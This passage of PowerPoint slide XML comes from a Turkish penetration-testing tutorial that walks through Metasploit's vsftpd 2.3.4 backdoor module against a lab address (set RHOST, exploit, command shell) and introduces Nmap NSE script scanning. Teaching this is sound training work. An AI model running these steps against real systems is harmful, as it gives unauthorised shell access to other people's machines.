                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/ftp/vsftpd_234_backdoor komutları ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploitimizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> kullanıma hazırlıyoruz. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>2. Adım olarak bizden istediği gereksinimleri soruyoruz. «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>show</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options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» komutundan yardım alıyoruz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="982712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E22C4ED3-57C5-F1C9-086E-CAF416DE565D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="0"/>
            <a:ext cx="12115800" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F56BEA0-8BB0-4D31-36D3-8FC506B53C39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="3429000"/>
            <a:ext cx="11115675" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> belirtmemiz gerektiğini söylüyor. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Requeired</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> karşılığında </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> olanları doldurmalıyız.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>set RHOST 10.0.2.5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Resim 5" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAE9C061-24BD-6434-1815-09C8B7F90CB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="4629329"/>
            <a:ext cx="12115800" cy="2228671"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Çerçeve 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6EC01DF-90C5-6505-9EC9-933523331E3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="314325" y="5972175"/>
            <a:ext cx="2843213" cy="3571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8" name="Çerçeve 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF050370-2EF6-D60A-9DA9-F6A03CDF6323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242888" y="528637"/>
            <a:ext cx="4757738" cy="94297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Sol Ok 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CF162D1-F481-916F-BAC7-5DA2051C2690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5634037" y="0"/>
            <a:ext cx="1138238" cy="2571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Sol Ok 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B3D10CB-65BF-F342-6D88-8DDDFDF44E14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5564981" y="4629150"/>
            <a:ext cx="1138238" cy="2571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85121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196E7364-CC6E-46FA-E8AE-AE6F8BF2B12F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="0"/>
            <a:ext cx="11472862" cy="3600450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Metin kutusu 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B1FF440-45B1-0C3D-4B6D-2B60E1532A93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="3743325"/>
            <a:ext cx="12087226" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Son adım </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>olara</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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> terminalinde «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» komutunu yazıp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>enter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> tuşuna basıyoruz. «</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Shell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" sz="2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>» çıktısını gördüğümüze göre sızma işlemi gerçekleşmiştir. İçerde komut işletmeye başlayabiliriz.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Çerçeve 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88D8E15A-0FF8-DC25-AE68-464AA2481036}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="2314575"/>
            <a:ext cx="8143875" cy="7429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2497604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B29EE5C7-1F0E-7120-2CA1-4BB7CB870FEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4315810" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Resim 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D6657FF-658E-19BE-5660-C3E7EBDB72D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315810" y="0"/>
            <a:ext cx="7876190" cy="2286000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Resim 6" descr="metin içeren bir resim&#10;&#10;Açıklama otomatik olarak oluşturuldu">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B1A3DBE-C049-B4E8-9A64-699C15D3F9BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4315809" y="2286000"/>
            <a:ext cx="7876189" cy="4509652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242575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E842F1-8BD0-34C3-7F87-AA7D6D9CC2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>NMAP SCRİPT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="İçerik Yer Tutucusu 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E93659AF-A542-B297-3D95-C5FA3090DADC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracı ile çalışmaya devam ediyoruz. Şimdi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> aracının başka modülü olan «NSE» </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Nmap</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Script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> Engine ile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> araması yapacağız. Bu kısımda kullanılacak parametremiz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> parametresi olacaktır. Belirli bir betiği kullanmak için ise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="tr-TR" b="1" dirty="0" err="1">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>script</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scriptadi.nse</a:t>
            </a:r>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parametresini kullanacağız.</a:t>
            </a:r>
            <a:endParaRPr lang="tr-TR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1508648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595DC6B8-38E6-37B1-AB76-465F023F3F02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="82176"/>
            <a:ext cx="12055423" cy="6618662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Dikdörtgen 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D3CDF38-A772-4D0A-4C57-4FD538AEEAAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="952107"/>
            <a:ext cx="4506012" cy="2582945"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX1" fmla="*/ 518191 w 4506012"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX2" fmla="*/ 946263 w 4506012"/>
              <a:gd name="connsiteY2" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX3" fmla="*/ 1599634 w 4506012"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX4" fmla="*/ 2117826 w 4506012"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX5" fmla="*/ 2636017 w 4506012"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX6" fmla="*/ 3289389 w 4506012"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX7" fmla="*/ 3762520 w 4506012"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX8" fmla="*/ 4506012 w 4506012"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 2582945"/>
              <a:gd name="connsiteX9" fmla="*/ 4506012 w 4506012"/>
              <a:gd name="connsiteY9" fmla="*/ 568248 h 2582945"/>
              <a:gd name="connsiteX10" fmla="*/ 4506012 w 4506012"/>
              <a:gd name="connsiteY10" fmla="*/ 1033178 h 2582945"/>
              <a:gd name="connsiteX11" fmla="*/ 4506012 w 4506012"/>
              <a:gd name="connsiteY11" fmla="*/ 1549767 h 2582945"/>
              <a:gd name="connsiteX12" fmla="*/ 4506012 w 4506012"/>
              <a:gd name="connsiteY12" fmla="*/ 2092185 h 2582945"/>
              <a:gd name="connsiteX13" fmla="*/ 4506012 w 4506012"/>
              <a:gd name="connsiteY13" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX14" fmla="*/ 3942761 w 4506012"/>
              <a:gd name="connsiteY14" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX15" fmla="*/ 3469629 w 4506012"/>
              <a:gd name="connsiteY15" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX16" fmla="*/ 2906378 w 4506012"/>
              <a:gd name="connsiteY16" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX17" fmla="*/ 2253006 w 4506012"/>
              <a:gd name="connsiteY17" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX18" fmla="*/ 1689755 w 4506012"/>
              <a:gd name="connsiteY18" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX19" fmla="*/ 1261683 w 4506012"/>
              <a:gd name="connsiteY19" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX20" fmla="*/ 788552 w 4506012"/>
              <a:gd name="connsiteY20" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX21" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY21" fmla="*/ 2582945 h 2582945"/>
              <a:gd name="connsiteX22" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY22" fmla="*/ 2066356 h 2582945"/>
              <a:gd name="connsiteX23" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY23" fmla="*/ 1549767 h 2582945"/>
              <a:gd name="connsiteX24" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY24" fmla="*/ 1059007 h 2582945"/>
              <a:gd name="connsiteX25" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY25" fmla="*/ 619907 h 2582945"/>
              <a:gd name="connsiteX26" fmla="*/ 0 w 4506012"/>
              <a:gd name="connsiteY26" fmla="*/ 0 h 258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06012" h="2582945" extrusionOk="0">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="143967" y="-27199"/>
                  <a:pt x="284205" y="34617"/>
                  <a:pt x="518191" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="752177" y="-34617"/>
                  <a:pt x="790888" y="38347"/>
                  <a:pt x="946263" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
